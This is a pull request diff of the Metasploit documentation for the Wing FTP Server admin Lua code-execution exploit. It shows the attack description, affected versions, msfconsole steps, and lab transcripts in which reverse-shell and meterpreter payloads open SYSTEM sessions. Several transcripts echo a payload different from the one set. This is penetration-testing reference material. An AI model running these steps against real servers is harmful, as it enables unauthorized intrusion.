### PR TITLE
Improvements and documentation for wing_ftp_admin_exec

### DIFF
--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -4,22 +4,25 @@ This module exploits the embedded Lua interpreter in the admin web interface for
 
 Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 presumably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
-Version 6.0.2 handles URL encoding differently compared to version 4.3.8. Encoding the PowerShell payload with base64 allows it to work. CmdStager fails, however, as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It will fall back to using `CmdStager` if `PowerShell` is absent. It does so by calling os.getenv() to get environment variables, then searching for `PowerShell`.
+Versions > 4.3.8 handle URL encoding differently compared to versions <= 4.3.8. Encoding the PowerShell payload with base64 allows it to work. CmdStager fails, however, as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It does so by calling `os.getenv()` to get environment variables, then searching for `PowerShell` case-insensitively. It will fall back to using `CmdStager` if `PowerShell` is absent and the version is <= 4.3.8.
 
 The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
 
 Information about the admin web interface can be found at [https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm].
 
-## Vulnerable application ##
+## Vulnerable Application ##
 
 All versions of Wing FTP Server from 3.0.0 and up are presumed vulnerable.
 
-Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:
+Upgraded module has been tested on a Windows Server 2019 Datacenter x64 with the following versions:
 
 - Wing FTP Server 4.3.8
+- Wing FTP Server 5.1.3
+- Wing FTP Server 6.0.1
 - Wing FTP Server 6.0.2
+- Wing FTP Server 6.0.3
 
-Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:
+Original module was been tested on Windows 7 SP1 and Windows 8.1 with the following versions:
 
 - Wing FTP Server 4.3.6
 - Wing FTP Server 4.3.8

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -4,6 +4,8 @@ This module exploits the embedded Lua interpreter in the admin web interface for
 
 Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 most probably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
+Version 6.0.2 handles URL encoding differently compared to version 4.3.8. This makes CmdStager fail (as it contains characters that cannot simply be base64 encoded, unlike PowerShell), so the use CmdStager against version 6.0.2 is strongly discouraged. Run `check` first before exploiting.
+
 The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
 
 Information about the admin web interface can be found at [https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm].
@@ -21,34 +23,34 @@ Information about the admin web interface can be found at [https://www.wftpserve
 5. Do `set PASSWORD <valid-password>`
 6. Optional: Do `set PAYLOAD windows/<your-preferred-shell>` (default is `windows/meterpreter/reverse_tcp`)
 7. Do `set LHOST <your-ip>`
-8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default is `PowerShell`)
+8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default and recommended is `PowerShell`)
 9. Do `exploit`
 10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
 
 ## Tested with Wing FTP Server 4.3.8 and 6.0.2, installed on Windows Server 2016 Datacenter x64 ##
 
-### With PowerShell using x64 meterpreter ###
+### With PowerShell using x64 meterpreter against version 6.0.2 ###
 
 ```
-msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
-PASSWORD => 5up3r53kr3tp@$$w0rd
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
 LHOST => 192.168.136.146
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
-[+] Wing FTP Server 4.3.8 appears vulnerable.
+[+] Wing FTP Server 6.0.2: appears vulnerable.
 [*] Executing payload via Powershell...
 [*] Sending stage (206403 bytes) to 192.168.136.151
-[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:17007) at 2018-12-08 02:44:27 +0800
+[*] Meterpreter session 6 opened (192.168.136.146:4444 -> 192.168.136.151:1879) at 2018-12-10 01:44:40 +0800
 
 meterpreter > sysinfo
 Computer        : 2K16DTCTR
@@ -61,27 +63,110 @@ Meterpreter     : x64/windows
 meterpreter > 
 ```
 
-### with PowerShell using x86 shell_reverse_tcp ###
+### with PowerShell using x86 shell_reverse_tcp against version 6.0.2 ###
 
 ```
-msf5 > use exploit/windows/ftp/wing_ftp_admin_exec
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
-PASSWORD => 5up3r53kr3tp@$$w0rd
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
 PAYLOAD => windows/shell_reverse_tcp
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
 LHOST => 192.168.136.146
-msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
-[+] Wing FTP Server 4.3.8 appears vulnerable.
+[+] Wing FTP Server 6.0.2: appears vulnerable.
 [*] Executing payload via Powershell...
-[*] Command shell session 2 opened (192.168.136.146:4444 -> 192.168.136.151:17067) at 2018-12-08 02:45:48 +0800
+[*] Command shell session 7 opened (192.168.136.146:4444 -> 192.168.136.151:1881) at 2018-12-10 01:45:18 +0800
+
+
+
+C:\Windows\system32>whoami & hostname & systeminfo
+whoami & hostname & systeminfo
+nt authority\system
+2K16DTCTR
+
+Host Name:                 2K16DTCTR
+OS Name:                   Microsoft Windows Server 2016 Datacenter
+OS Version:                10.0.14393 N/A Build 14393
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+<... snip ...>
+Network Card(s):           2 NIC(s) Installed.
+                           [01]: Intel(R) 82574L Gigabit Network Connection
+                                 Connection Name: Ethernet0
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.136.254
+                                 IP address(es)
+                                 [01]: 192.168.136.151
+                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
+                           [02]: Microsoft KM-TEST Loopback Adapter
+                                 Connection Name: Npcap Loopback Adapter
+                                 Status:          Hardware not present
+<... snip ...>
+```
+### with PowerShell using x64 meterpreter against version 4.3.8 ###
+
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[+] Wing FTP Server 4.3.8: appears vulnerable.
+[*] Executing payload via Powershell...
+[*] Sending stage (206403 bytes) to 192.168.136.151
+[*] Meterpreter session 8 opened (192.168.136.146:4444 -> 192.168.136.151:1886) at 2018-12-10 01:47:06 +0800
+
+meterpreter > sysinfo
+Computer        : 2K16DTCTR
+OS              : Windows 2016 (Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### with PowerShell using x86 shell_reverse_tcp against version 4.3.8 ###
+
+```
+msf > use exploit/windows/ftp/wing_ftp_admin_exec
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+RHOST => 192.168.136.151
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+LHOST => 192.168.136.146
+msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.136.146:4444 
+[*] Authenticating...
+[+] Wing FTP Server 4.3.8: appears vulnerable.
+[*] Executing payload via Powershell...
+[*] Command shell session 9 opened (192.168.136.146:4444 -> 192.168.136.151:1889) at 2018-12-10 01:48:02 +0800
 
 
 
@@ -111,7 +196,7 @@ Network Card(s):           2 NIC(s) Installed.
 <... snip ...>
 ```
 
-### with CmdStager using x64 meterpreter ###
+### with CmdStager using x64 meterpreter against version 4.3.8 ###
 
 ```
 msf > use exploit/windows/ftp/wing_ftp_admin_exec
@@ -119,8 +204,8 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
-PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
@@ -131,7 +216,7 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
-[+] Wing FTP Server 4.3.8 appears vulnerable.
+[+] Wing FTP Server 4.3.8: appears vulnerable.
 [*] Sending payload
 [*] Command Stager progress -  12.42% done (1499/12068 bytes)
 [*] Command Stager progress -  24.84% done (2998/12068 bytes)
@@ -143,7 +228,7 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 [*] Command Stager progress -  98.75% done (11917/12068 bytes)
 [*] Sending stage (206403 bytes) to 192.168.136.151
 [*] Command Stager progress - 100.00% done (12068/12068 bytes)
-[*] Meterpreter session 3 opened (192.168.136.146:4444 -> 192.168.136.151:1631) at 2018-12-07 02:49:01 +0800
+[*] Meterpreter session 10 opened (192.168.136.146:4444 -> 192.168.136.151:1893) at 2018-12-10 01:49:32 +0800
 
 meterpreter > sysinfo
 Computer        : 2K16DTCTR
@@ -156,7 +241,7 @@ Meterpreter     : x64/windows
 meterpreter > 
 ```
 
-### With CmdStager using x86 shell_reverse_tcp ###
+### With CmdStager using x86 shell_reverse_tcp against version 4.3.8 ###
 
 ```
 msf > use exploit/windows/ftp/wing_ftp_admin_exec
@@ -164,8 +249,8 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
-PASSWORD => 5up3r53kr3tp@$$w0rd
+msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
+PASSWORD => password
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
 PAYLOAD => windows/shell_reverse_tcp
 msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
@@ -176,19 +261,16 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
-[+] Wing FTP Server 4.3.8 appears vulnerable.
+[+] Wing FTP Server 4.3.8: appears vulnerable.
 [*] Sending payload
 [*] Command Stager progress -   1.47% done (1499/102292 bytes)
 [*] Command Stager progress -   2.93% done (2998/102292 bytes)
 [*] Command Stager progress -   4.40% done (4497/102292 bytes)
-[*] Command Stager progress -   5.86% done (5996/102292 bytes)
-[*] Command Stager progress -   7.33% done (7495/102292 bytes)
-[*] Command Stager progress -   8.79% done (8994/102292 bytes)
-[*] Command Stager progress -  10.26% done (10493/102292 bytes)
 <... snip ...>
 [*] Command Stager progress -  99.55% done (101827/102292 bytes)
 [*] Command Stager progress - 100.00% done (102292/102292 bytes)
-[*] Command shell session 4 opened (192.168.136.146:4444 -> 192.168.136.151:1639) at 2018-12-07 02:52:10 +0800
+[*] Command shell session 11 opened (192.168.136.146:4444 -> 192.168.136.151:1897) at 2018-12-10 01:50:56 +0800
+
 
 
 C:\Windows\system32>whoami & hostname & systeminfo

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -2,9 +2,9 @@
 
 This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
 
-Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
+Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 presumably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
-Version 6.0.2 handles URL encoding differently compared to version 4.3.8. This makes CmdStager fail as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It will fall back to using `CmdStager` if `PowerShell` is absent. It does so by calling os.getenv() to get environment variables, then searching for `PowerShell`.
+Version 6.0.2 handles URL encoding differently compared to version 4.3.8. Encoding the PowerShell payload with base64 allows it to work. CmdStager fails, however, as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It will fall back to using `CmdStager` if `PowerShell` is absent. It does so by calling os.getenv() to get environment variables, then searching for `PowerShell`.
 
 The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
 
@@ -12,7 +12,7 @@ Information about the admin web interface can be found at [https://www.wftpserve
 
 ## Vulnerable application ##
 
-All versions of Wing FTP Server from 3.0.0 and up are vulnerable.
+All versions of Wing FTP Server from 3.0.0 and up are presumed vulnerable.
 
 Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:
 

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -1,6 +1,6 @@
 ## Description ##
 
-This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
+This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
 
 Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 most probably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
@@ -10,7 +10,7 @@ Information about the admin web interface can be found at [https://www.wftpserve
 
 ## Vulnerable application ##
 
-3.0.0 < Wing FTP Server Version <= 4.3.8
+3.0.0 <= Wing FTP Server Version <= 6.0.2
 
 ## Verification Steps ##
 
@@ -25,7 +25,7 @@ Information about the admin web interface can be found at [https://www.wftpserve
 9. Do `exploit`
 10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
 
-## Tested with Wing FTP Server 4.3.8 installed on Windows Server 2016 Datacenter x64 ##
+## Tested with Wing FTP Server 4.3.8 and 6.0.2, installed on Windows Server 2016 Datacenter x64 ##
 
 ### With PowerShell using x64 meterpreter ###
 

--- a/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
+++ b/documentation/modules/exploit/windows/ftp/wing_ftp_admin_exec.md
@@ -1,45 +1,54 @@
-## Description
+## Description ##
 
-This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
+This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
 
-## Vulnerable application
+Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 most probably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
 
-Wing FTP Server <= 4.3.8
+The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
 
-## Verification Steps
-    1. Start `msfconsole`
-    2. Do `use exploit/windows/ftp/wing_ftp_admin_exec`
-    3. Do `set RHOST <target-ip>`
-    4. Do `set USERNAME <valid-username>`
-    5. Do `set PASSWORD <valid-password>`
-    6. Optional: Do `set PAYLOAD windows/<your-preferred-shell>` (default is `windows\meterpreter\reverse_tcp`)
-    7. Do `set LHOST <your-ip>`
-    8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default is `PowerShell`)
-    9. Do `exploit`
-    10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
+Information about the admin web interface can be found at [https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm].
 
-## Tested with Wing FTP Server 4.3.8 on Windows Server 2016 Datacenter x64
+## Vulnerable application ##
 
-### With PowerShell using x64/meterpreter ###
+3.0.0 < Wing FTP Server Version <= 4.3.8
+
+## Verification Steps ##
+
+1. Start `msfconsole`
+2. Do `use exploit/windows/ftp/wing_ftp_admin_exec`
+3. Do `set RHOST <target-ip>`
+4. Do `set USERNAME <valid-username>`
+5. Do `set PASSWORD <valid-password>`
+6. Optional: Do `set PAYLOAD windows/<your-preferred-shell>` (default is `windows/meterpreter/reverse_tcp`)
+7. Do `set LHOST <your-ip>`
+8. Optional: Do `set TARGET <target>` to specify whether PowerShell/CmdStager will be used (default is `PowerShell`)
+9. Do `exploit`
+10. Verify that a shell of your specified type (Meterpreter, plain old shell, etc.) pops
+
+## Tested with Wing FTP Server 4.3.8 installed on Windows Server 2016 Datacenter x64 ##
+
+### With PowerShell using x64 meterpreter ###
+
 ```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec 
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
 PASSWORD => 5up3r53kr3tp@$$w0rd
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
 LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
+[+] Wing FTP Server 4.3.8 appears vulnerable.
 [*] Executing payload via Powershell...
 [*] Sending stage (206403 bytes) to 192.168.136.151
-[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:1616) at 2018-12-07 02:43:10 +0800
+[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:17007) at 2018-12-08 02:44:27 +0800
 
 meterpreter > sysinfo
 Computer        : 2K16DTCTR
@@ -52,62 +61,57 @@ Meterpreter     : x64/windows
 meterpreter > 
 ```
 
-### with PowerShell using shell_reverse_tcp ###
-
+### with PowerShell using x86 shell_reverse_tcp ###
 
 ```
-msf > use exploit/windows/ftp/wing_ftp_admin_exec
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
+msf5 > use exploit/windows/ftp/wing_ftp_admin_exec
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
 RHOST => 192.168.136.151
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
 USERNAME => admin
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD 5up3r53kr3tp@$$w0rd
 PASSWORD => 5up3r53kr3tp@$$w0rd
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PAYLOAD windows/shell_reverse_tcp
 PAYLOAD => windows/shell_reverse_tcp
-msf exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set LHOST 192.168.136.146
 LHOST => 192.168.136.146
-msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
+msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
+[+] Wing FTP Server 4.3.8 appears vulnerable.
 [*] Executing payload via Powershell...
-[*] Command shell session 2 opened (192.168.136.146:4444 -> 192.168.136.151:1623) at 2018-12-07 02:45:32 +0800
+[*] Command shell session 2 opened (192.168.136.146:4444 -> 192.168.136.151:17067) at 2018-12-08 02:45:48 +0800
 
 
-C:\Windows\system32>whoami & hostname & ipconfig
-whoami & hostname & ipconfig
+
+C:\Windows\system32>whoami & hostname & systeminfo
+whoami & hostname & systeminfo
 nt authority\system
 2K16DTCTR
 
-Windows IP Configuration
-
-
-Ethernet adapter Ethernet0:
-
-   Connection-specific DNS Suffix  . : localdomain
-   Link-local IPv6 Address . . . . . : fe80::8cb0:9bf1:fefe:5fbd%14
-   IPv4 Address. . . . . . . . . . . : 192.168.136.151
-   Subnet Mask . . . . . . . . . . . : 255.255.255.0
-   Default Gateway . . . . . . . . . : 192.168.136.2
-
-Tunnel adapter Teredo Tunneling Pseudo-Interface:
-
-   Connection-specific DNS Suffix  . : 
-   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6abd:ced:1cd7:3f57:7768
-   Link-local IPv6 Address . . . . . : fe80::ced:1cd7:3f57:7768%18
-   Default Gateway . . . . . . . . . : ::
-
-Tunnel adapter isatap.localdomain:
-
-   Media State . . . . . . . . . . . : Media disconnected
-   Connection-specific DNS Suffix  . : localdomain
-
-C:\Windows\system32>
-
+Host Name:                 2K16DTCTR
+OS Name:                   Microsoft Windows Server 2016 Datacenter
+OS Version:                10.0.14393 N/A Build 14393
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+<... snip ...>
+Network Card(s):           2 NIC(s) Installed.
+                           [01]: Intel(R) 82574L Gigabit Network Connection
+                                 Connection Name: Ethernet0
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.136.254
+                                 IP address(es)
+                                 [01]: 192.168.136.151
+                                 [02]: fe80::8cb0:9bf1:fefe:5fbd
+                           [02]: Microsoft KM-TEST Loopback Adapter
+                                 Connection Name: Npcap Loopback Adapter
+                                 Status:          Hardware not present
+<... snip ...>
 ```
 
-### with CmdStager using x64/meterpreter ###
+### with CmdStager using x64 meterpreter ###
 
 ```
 msf > use exploit/windows/ftp/wing_ftp_admin_exec
@@ -127,6 +131,7 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
+[+] Wing FTP Server 4.3.8 appears vulnerable.
 [*] Sending payload
 [*] Command Stager progress -  12.42% done (1499/12068 bytes)
 [*] Command Stager progress -  24.84% done (2998/12068 bytes)
@@ -151,7 +156,7 @@ Meterpreter     : x64/windows
 meterpreter > 
 ```
 
-### With CmdStager using shell_reverse_tcp ###
+### With CmdStager using x86 shell_reverse_tcp ###
 
 ```
 msf > use exploit/windows/ftp/wing_ftp_admin_exec
@@ -171,6 +176,7 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 
 [*] Started reverse TCP handler on 192.168.136.146:4444 
 [*] Authenticating...
+[+] Wing FTP Server 4.3.8 appears vulnerable.
 [*] Sending payload
 [*] Command Stager progress -   1.47% done (1499/102292 bytes)
 [*] Command Stager progress -   2.93% done (2998/102292 bytes)
@@ -185,33 +191,28 @@ msf exploit(windows/ftp/wing_ftp_admin_exec) > exploit
 [*] Command shell session 4 opened (192.168.136.146:4444 -> 192.168.136.151:1639) at 2018-12-07 02:52:10 +0800
 
 
-C:\Windows\system32>whoami & hostname & ipconfig
-whoami & hostname & ipconfig
+C:\Windows\system32>whoami & hostname & systeminfo
+whoami & hostname & systeminfo
 nt authority\system
 2K16DTCTR
 
-Windows IP Configuration
-
-
-Ethernet adapter Ethernet0:
-
-   Connection-specific DNS Suffix  . : localdomain
-   Link-local IPv6 Address . . . . . : fe80::8cb0:9bf1:fefe:5fbd%14
-   IPv4 Address. . . . . . . . . . . : 192.168.136.151
-   Subnet Mask . . . . . . . . . . . : 255.255.255.0
-   Default Gateway . . . . . . . . . : 192.168.136.2
-
-Tunnel adapter Teredo Tunneling Pseudo-Interface:
-
-   Connection-specific DNS Suffix  . : 
-   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6abd:ced:1cd7:3f57:7768
-   Link-local IPv6 Address . . . . . : fe80::ced:1cd7:3f57:7768%18
-   Default Gateway . . . . . . . . . : ::
-
-Tunnel adapter isatap.localdomain:
-
-   Media State . . . . . . . . . . . : Media disconnected
-   Connection-specific DNS Suffix  . : localdomain
-
-C:\Windows\system32>
+Host Name:                 2K16DTCTR
+OS Name:                   Microsoft Windows Server 2016 Datacenter
+OS Version:                10.0.14393 N/A Build 14393
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+<... snip ...>
+Network Card(s):           2 NIC(s) Installed.
+                           [01]: Intel(R) 82574L Gigabit Network Connection
+                                 Connection Name: Ethernet0
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.136.254
+                                 IP address(es)
